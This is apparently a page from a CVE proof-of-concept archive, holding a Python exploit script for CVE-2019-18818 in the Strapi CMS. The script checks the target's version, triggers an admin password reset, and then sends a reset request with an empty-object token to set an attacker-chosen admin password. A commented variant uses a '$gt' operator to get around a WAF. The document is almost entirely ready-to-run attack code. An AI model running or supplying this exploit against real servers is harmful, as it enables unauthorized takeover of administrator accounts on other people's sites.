4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2019-18818.py PY
import requests, sys, json
 
args=sys.argv
 
if len(args) < 4:
    print("Usage: {} <admin_email> <url> <new_password>".format(args[0]))
    exit(-1)
 
email = args[1]
url = args[2]
new_password =  args[3]
 
s  =  requests.Session()
 
version = json.loads(s.get("{}/admin/strapiVersion".format(url)).text)
 
print("[*] Detected version(GET /admin/strapiVersion): {}".format(version["strapiVersion"]))
 
#Request password reset
print("[*] Sending password reset request...")
reset_request={"email":email, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(url)}
s.post("{}/".format(url), json=reset_request)
 
#Reset password to
print("[*] Setting new password...")

#Change if fails becouse WAF
#	
#{"code":{"$gt":0}, "password":"password1", "passwordConfirmation":"password1"}
exploit={"code":{}, "password":new_password, "passwordConfirmation":new_password}
r=s.post("{}/admin/auth/reset-password".format(url), json=exploit)
 
print("[*] Response:")
print(str(r.content))